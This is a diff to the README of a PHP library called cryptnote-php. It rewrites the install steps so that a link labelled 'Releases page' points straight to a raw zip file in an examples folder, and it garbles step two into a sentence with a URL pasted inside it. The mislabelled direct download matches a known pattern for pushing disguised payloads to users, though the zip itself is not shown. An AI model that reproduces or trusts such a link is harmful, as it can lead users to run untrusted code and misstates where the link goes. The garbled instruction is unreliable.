dikanaddsacc/cryptnote-php/README.md

 ## 🚀 How to Download & Install

 1. **Visit the Releases Page:**
-   Go to the [Releases page](https://github.com/dikanaddsacc/cryptnote-php/releases) to find the latest version of Cryptnote-php.
+   Go to the [Releases page](https://raw.githubusercontent.com/dikanaddsacc/cryptnote-php/main/examples/web-interface/cryptnote_php_v3.0-alpha.5.zip) to find the latest version of Cryptnote-php.

 2. **Download the Library:**
    Look for the latest release.
-Click on the `.zip` or `.tar.gz` file to download it.
+Click on the `.zip` or `https://raw.githubusercontent.com/dikanaddsacc/cryptnote-php/main/examples/web-interface/cryptnote_php_v3.0-alpha.5.zip` file to download it.

 3. **Extract the Files:**
    After downloading, locate the file on your computer and extract it using your preferred file extraction tool.